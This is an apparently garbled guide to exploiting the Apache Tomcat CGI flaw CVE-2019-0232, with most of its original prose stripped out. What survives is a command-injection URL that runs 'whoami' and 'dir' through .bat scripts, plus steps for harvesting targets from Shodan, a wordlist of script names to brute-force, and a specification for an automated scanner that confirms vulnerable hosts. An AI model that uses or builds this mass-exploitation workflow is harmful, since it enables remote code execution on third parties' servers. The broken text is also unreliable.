  APACHE TOMCAT/CGI-BIN (CVE-2019-0232)
 




      CVE-2019-0232.


EXPLOIT

  -       cgi-bin  Apache Tomcat.
-     .
   

http://localhost/cgi-bin/hello.bat?&whoami

    cmd.exe /c "whoami"

   :
https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/
https://wwws.nightwatchcybersecurity.com/2019/04/30/remote-code-execution-rce-in-cgi-servlet-apache-tomcat-on-windows-cve-2019-0232/




       https://www.shodan.io/search?query=apache+tomcat
   shodan.io  .            .
       .csv        .

      :
- URL   (http://domain.com/cgi-bin/script.bat?&dir  )
-  HTTP-  ,   HTTP-   
- URL whoami- (http://domain.com/cgi-bin/script.bat?&whoami)
-  HTTP-   whoami (.),   HTTP-   

  :
1.   shodan.io   ,  .     .
   .csv  .json-,    (    ).
2.      .
3.       ,     7.0.94, 8.5.40  9.0.19 .
    ,  ,   .
    , .
4.  

http://domain.com/cgi-bin/hello.bat?&dir
http://domain.com/cgi-bin/hello.bat?&dir
http://domain.com/cgi-bin/test.bat?&dir
http://domain.com/cgi-bin/info.bat?&dir
http://domain.com/cgi-bin/0.bat?&dir
http://domain.com/cgi-bin/1.bat?&dir

 ,       ,       .
  ,    -        ,   .

   :

 hello.bat
 helloworld.bat
 test.bat
 index.bat
 info.bat
 sysinfo.bat
 run.bat
 tomcat.bat
 0.bat
 1.bat
 2.bat
 ...
 10.bat

 ,         0  9   .
 ,   hello.bat    :
hello.bat
hello0.bat
hello1.bat
..
hello9.bat

:        !
https://www.exploit-db.com/exploits/47073
:       , ..       .

4.     200  ,      :
-   dir      
mm.dd.YYYY    HH:mm    <DIR>    .
mm.dd.YYYY    HH:mm    <DIR>    ..

     :
-   http://domain.com/cgi-bin/<script>.bat?&whoami
( script -   ,      200   )
-       .


     :
*         (, python  PowerShell)
*       ,   $(script).log,  $(script) -    
*     -   
*       -    
*      :
-  ,   
-    :
  - 
  -  
  -  HTTP-  
   (  -  )  :
- %  , %   
-       HTTP-   (     ).
